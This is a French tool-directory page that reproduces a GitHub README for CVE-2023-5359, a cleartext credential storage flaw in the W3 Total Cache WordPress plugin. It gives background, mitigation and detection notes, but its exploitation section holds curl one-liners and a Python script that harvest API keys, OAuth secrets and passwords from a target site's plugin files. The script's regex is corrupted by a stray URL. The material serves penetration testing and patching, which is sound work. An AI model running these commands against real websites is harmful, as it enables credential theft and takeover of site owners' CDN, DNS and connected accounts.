Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-5359 — Scanner CVE-2023-5359 pour la vulnérabilité de stockage en texte clair de W3 Total Cache. Détecte les identifiants exposés (clés API, jetons OAuth) dans les fichiers PHP accessibles publiquement. Inclut des scripts d'exploitation manuels et automatisés. | Kitploit
Outils/GitHubGitHub/enzocipher/cve-2023-5359
Scanners de VulnérabilitésAttaques de Mots de PasseExploitationCollecte d'InformationsSécurité WebApprentissage et Éducation
GitHubenzocipher/cve-2023-5359

CVE-2023-5359

Scanner CVE-2023-5359 pour la vulnérabilité de stockage en texte clair de W3 Total Cache. Détecte les identifiants exposés (clés API, jetons OAuth) dans les fichiers PHP accessibles publiquement. Inclut des scripts d'exploitation manuels et automatisés.

Voir le dépôt
7il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-5359 - Vulnérabilité de stockage en texte clair de W3 Total Cache

Description

CVE-2023-5359 est une vulnérabilité de stockage en texte clair affectant le plugin WordPress W3 Total Cache dans les versions ≤ 2.7.5. Cette vulnérabilité permet à des attaquants distants d'accéder à des informations d'identification sensibles stockées dans des fichiers PHP non chiffrés et accessibles publiquement.

Sévérité

  • Score CVSS : 7.5 (Élevé)
  • Vecteur : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • Type : Exposition d'informations sensibles

Vulnérabilité technique

Cause racine

W3 Total Cache stocke les paramètres de configuration et les identifiants API dans des fichiers PHP situés dans le répertoire /wp-content/plugins/w3-total-cache/ sans protection adéquate. Ces fichiers sont accessibles via HTTP, exposant :

  • Clés API (CloudFlare, Google, etc.)
  • Secrets client
  • Jetons OAuth
  • Identifiants de services externes

Fichiers concernés

/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php
/wp-content/plugins/w3-total-cache/Config.php
/wp-content/plugins/w3-total-cache/Cache_File.php

Exploitation

Méthode manuelle

# Vérifier si W3 Total Cache est installé
curl -s https://target.com/ | grep "w3-total-cache"

# Extraire les identifiants CloudFlare
curl -s "https://target.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php" | grep -E "client_id|client_secret"

# Rechercher dans tous les fichiers vulnérables
for file in Extension_CloudFlare_Plugin.php Generic_Plugin_Admin.php Config.php; do
    echo "=== $file ==="
    curl -s "https://target.com/wp-content/plugins/w3-total-cache/$file" | grep -E "api_key|password|secret"
done

Script automatisé

#!/usr/bin/env python3
import requests
import re

target = "https://victim.com"
files = [
    "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
    "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php"
]

for file in files:
    response = requests.get(target + file)
    credentials = re.findall(r"(api_key|client_secret|password)\s*=\s*['\"](https://github.com/enzocipher/cve-2023-5359/blob/main/%5B%5E%27%5C%22%5D%2B)", response.text)
    if credentials:
        print(f"[!] Identifiants trouvés dans {file}:")
        for key, value in credentials:
            print(f"    {key}: {value}")

Impact

Un attaquant peut obtenir :

  1. Identifiants CloudFlare — Prendre le contrôle du CDN et du DNS
  2. Clés API pour services externes — Accéder à des comptes externes
  3. Jetons OAuth — Usurper une identité
  4. Configurations du cache — Manipuler le contenu servi

Atténuation

Solution immédiate

  1. Mettez à jour vers W3 Total Cache ≥ 2.7.6
  2. Restreignez l'accès aux fichiers PHP du répertoire des plugins
  3. Révoquez et regénérez tous les identifiants exposés

Configuration sécurisée

# Protection .htaccess
<Files *.php>
    Deny from all
</Files>
<Files "w3-total-cache.php">
    Allow from all
</Files>

Détection

Commande de vérification

# Vérifier la version vulnérable
curl -s https://target.com/wp-content/plugins/w3-total-cache/w3-total-cache.php | grep "Version"

Indicateurs de compromission

  • Activité inhabituelle dans les API externes
  • Modifications des configurations CloudFlare
  • Trafic provenant d'IP non autorisées vers les services connectés

Exemple de résultat

[*] Scan : https://example.com
[+] W3 Total Cache détecté
[+] Fichier accessible : /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
[!] IDENTIFIANTS TROUVÉS :
    client_id: GAxxxxxxxxxxxx78
    client_secret: ABcdEFghIJklMNopQRstUVwxYZ012345

Références

  • CVE-2023-5359
  • Journal des modifications de W3 Total Cache
  • Équipe de sécurité WordPress

Avis juridique

Ce dépôt est destiné à des fins éducatives et aux tests de pénétration autorisés uniquement. Toute utilisation malveillante de ces informations est strictement interdite.


Ces informations vous ont-elles été utiles ? Mettez une étoile au dépôt !

Dernière mise à jour : novembre 2025

Télécharger l’outil